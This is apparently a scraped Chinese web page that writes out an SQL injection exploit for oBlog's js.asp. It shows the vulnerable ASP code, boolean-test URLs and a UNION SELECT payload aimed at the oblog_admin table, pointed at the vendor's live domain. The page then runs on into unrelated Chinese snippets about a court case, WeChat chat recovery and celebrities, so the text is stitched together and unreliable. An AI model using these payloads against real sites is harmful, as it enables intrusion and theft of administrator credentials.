漏洞文件:js.asp
<%
Dim oblog
set oblog=new class_sys
oblog.autoupdate=False
oblog.start
dim js_blogurl,n
js_blogurl=Trim(oblog.CacheConfig(3))
n=CInt(Request(”n”))
if n=0 then n=1
select case CInt(Request(”j”))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8
call showplace()
case 9
call showphoto()
case 10
call showblogstars()
Case 11
Call show_hotblog()
Case 12
Call show_teams()
Case 13
Call show_posts()
Case 14
Call show_hottag()
case 0
call showlog()
end select
****************省略部分代码******************
Sub show_posts()
Dim teamid,postnum,l,u,t
teamid=Request(”tid”)
postnum=n
l=CInt(Request(”l”))
u=CInt(Request(”u”))
t=CInt(Request(”t”))
Dim rs,sql,sRet,sAddon
Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
If teamid<>“” And teamid<>“0″ Then
teamid=Replace(teamid,”|”,”,”)
Sql=Sql & ” And teamid In (” & teamid & “) ”
End If
Sql=Sql & ” order by postid Desc”
Set rs=oblog.Execute(Sql)
sRet=”
”
Do While Not rs.Eof
sAddon=”"
* sRet=sRet & “ ” & oblog.Filt_html(Left(rs(2),l)) & “”
If u=1 Then sAddon=rs(4)
if t=1 Then
If sAddon<>“” Then sAddon=sAddon & “,”
sAddon=sAddon & rs(3)
End If
If sAddon<>“” Then sAddon=”(” & sAddon & “)”
sRet=sRet & sAddon & “
”
rs.Movenext
Loop
Set rs = Nothing
sRet=sRet & “
”
Response.write oblog.htm2js (sRet,True)
End Sub
调用show_posts()过程必须要符合上面的参数n=1,j=13
(” & teamid & “)
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=1 返回正常
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=2 返回异常
猜管理员表名
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1
Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1
document.write('
备受关注的广西中美天米融资性担保集团有限公司(以下简称为中美天米集团)被控单位骗取银行贷款及单位行贿犯罪一案,于2017年1月首次开庭休庭后,今年8月2日上午9时30分,在柳州市中级人民法院公开复庭审...
夏日炎炎许多盆友都非常容易上边,和盆友朋友生发火,就随手把他的微信聊天记录给删除了,可是夏季的火见效快去得也快,这些被大家删除的盆友依然是盆友,吵架架的朋友也依然是朋友,那麼碰到这类状况,大家该如何把...
看见有人提“商场里几百块钱的衣服和淘宝上八、九十的衣服有什么区别”的问题,f答疑者众。各位答主很热心的参与进来,纷纷从自己的角度进行了不同的分析与经验的分享,都分析得有理有据,笔者作为一个在服装圈混了...
本文目录一览: 1、我这配置 看电影巨卡 看黑客帝国3 卡的不成样子了 2、黑客帝国1,2,3讲的是什么? 3、求黑客帝国3高清国语版 大家记住关键词 高清、国语。 4、哪里有清晰不卡的黑...
朴寒星感情现状如何 她与圈外老公离婚的吗 韩国女星朴寒星感情现状如何呢?很多网友知道朴寒星,并不是她的演艺事业而是她的感情。朴寒星在经历过2次失败的感情以后,并没有对外公开过已经交往男友的事实,而是直...
微信备份的聊天记录怎么查看?随着时代的进步,大家更换新手机的速度也越来越快,换手机很简单,但随之而来的问题就是数据转移,特别像微信,里面保留了很多重要的聊天记录,怎么备份微信聊天记录呢?如果在备份...